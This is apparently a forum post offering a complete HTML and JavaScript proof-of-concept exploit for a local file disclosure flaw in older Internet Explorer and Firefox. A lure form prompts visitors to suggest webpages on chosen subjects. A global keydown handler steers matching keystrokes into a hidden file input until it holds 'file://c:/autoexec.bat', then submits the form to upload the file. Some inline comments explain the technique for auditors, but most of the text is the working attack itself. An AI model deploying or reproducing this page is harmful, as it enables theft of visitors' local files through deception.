
Internet Explorer & Mozilla Firefox Local File Disclosure Vulnerability PoC Exploit (Reported by Symantec)



This is a sample PoC Exploit for the Internet Explorer and Mozilla Firefox security flaw explained here:
http://www.techweb.com/showArticle.jhtml?articleID=188702202
and reported by Symantec.

The subjects suggested for the links are chosen to get the user to type:
FILE
AUTOEXEC
BAT

so we can receive:
file://c:/autoexec.bat

and upload this file to a server.

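This is a low risk vulnerability: it only works if the user types every character of the path, in order, while on the page, and it can only reach a file whose path was fixed in advance.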

//--START HTML CODE--//
<html>
<body>
<!-- Lure form: the visible textarea collects what the visitor types, while the
     file input further down is the control the script steers key presses into.
     Per the post, the listed subjects are picked so the visitor types the
     words FILE, AUTOEXEC and BAT. -->
<form method=post action="upload.php" type="multipart/form-data">
Please sugest 3 webpages for each subject (please include http:// or https://)
<ul>
<li>Freeware Files Download</li>
<li>Automovilism</li>
<li>Extreme Sports</li>
<li>Technology</li>
<li>Batman</li>
</ul>
<textarea name=other style="width:100%;height:50%"></textarea><br>
<!-- Review note: this file control is disabled, hidden and sized 1x1, and the
     script enables and focuses it during key handling. A hidden file input
     that script focuses from a key handler is the pattern to look for when
     auditing pages for this technique. -->
<input type=file name=thet disabled style="visibility:hidden;height:1;width:1">
</form>
<script>
/**
*  OnKeyDown - JavaScript - Local File Disclosure vuln. PoC
*		by sirdarckcat [at] gmail [.] com
*                   from: 	elhacker.net
**/
// Three parallel tables with 22 entries each, one per character of thefilew.
// nidshift[i]: 1 when Shift must be held for position i, 0 when it must not
// be held (compared against chift in checa).
var nidshift = new Array(0 ,0 ,0 ,0 ,1  ,0  ,0  ,0 ,1  ,0  ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0  ,0 ,0 ,0);
// thefilek[i]: key code expected at position i (compared with the keydown code).
// NOTE(review): codes such as 190 and 111 depend on keyboard layout; which
// layout the author targeted is not stated on the page.
var thefilek = new Array(70,73,76,69,190,111,111,67,190,111,65,85,84,79,69,88,69,67,190,66,65,84);
// Target path; its characters are appended to the textarea one at a time as
// each expected key is seen.
var thefilew = "file://c:/autoexec.bat";
// Index of the next expected entry in thefilek / thefilew / nidshift.
var dv = 0;
// Whether Shift (key code 16) is currently considered held.
var chift = false;
// The hidden <input type=file name=thet> of the first form.
var teo = document.forms[0].thet;
// The visible <textarea name=other> of the first form.
var feo = document.forms[0].other;

/**
 * keydown handler. Walks through the expected key sequence in thefilek and
 * moves focus between the visible textarea (feo) and the hidden file input
 * (teo) depending on whether the pressed key is the next expected one.
 *
 * @param tecla key event object; its `which` is used when truthy, otherwise
 *              the global `event.keyCode` is read.
 *
 * Review note: the post's stated goal is that the matching key presses end up
 * in the file control. Browsers that refuse typed text in file inputs and keep
 * the control's value read-only to script are not expected to be affected;
 * confirm against the vendor advisories for the versions you support.
 */
function checa(tecla) {
		var rt=(tecla.which)?tecla.which:event.keyCode;
		// lw is computed but not used anywhere in this function.
		var lw=String.fromCharCode(rt);
		// Once every position has been matched, the next keydown submits the
		// form. There is no return, so the rest of the handler still runs.
		if (dv>=thefilew.length){
			document.forms[0].submit();
		}
		// Key code 16 is Shift: remember that it is down.
		if (rt == 16){
			chift = true;
		}
		if (rt==thefilek[dv]){
			// Accept the key only when the Shift state agrees with nidshift[dv].
			// There is no else for this inner test: the right key with the
			// wrong Shift state changes nothing.
			if ((nidshift[dv] && chift) || (!nidshift[dv] && !chift)){
				// Enable, show and focus the file input during keydown.
				teo.disabled=false;
				teo.style.visibility="visible";
				teo.focus();
				// Mirror the expected character into the textarea and advance.
				feo.value += thefilew[dv];
				dv++;
			}
		}else{
			// Any other key: focus goes back to the textarea and the file
			// input is disabled and hidden again.
			feo.focus();
			teo.disabled=true;
			teo.style.visibility="hidden";
		}
}
/**
 * keyup handler: clears the Shift flag when the released key has code 16.
 *
 * @param tecla key event object; `which` is used when truthy, otherwise the
 *              global `event.keyCode` is read.
 */
function solsh(tecla){
	var code = tecla.which ? tecla.which : event.keyCode;
	// Only the Shift key (code 16) is of interest here.
	if (code != 16) {
		return;
	}
	chift = false;
}
/**
 * keypress handler: sets the Shift flag when the reported code is 16.
 *
 * @param tecla key event object; `which` is used when truthy, otherwise the
 *              global `event.keyCode` is read.
 */
function mprss(tecla){
	var code;
	if (tecla.which) {
		code = tecla.which;
	} else {
		code = event.keyCode;
	}
	// 16 is the Shift key code used throughout this script.
	if (code == 16) {
		chift = true;
	}
}
// Install the three handlers document-wide, so every key event on the page
// passes through them regardless of which element has focus.
document.onkeydown = checa;
document.onkeypress = mprss;
document.onkeyup = solsh;
</script>
</body>
</html>
//--END HTML CODE--//

Att.
Sirdarckcat
www.elhacker.net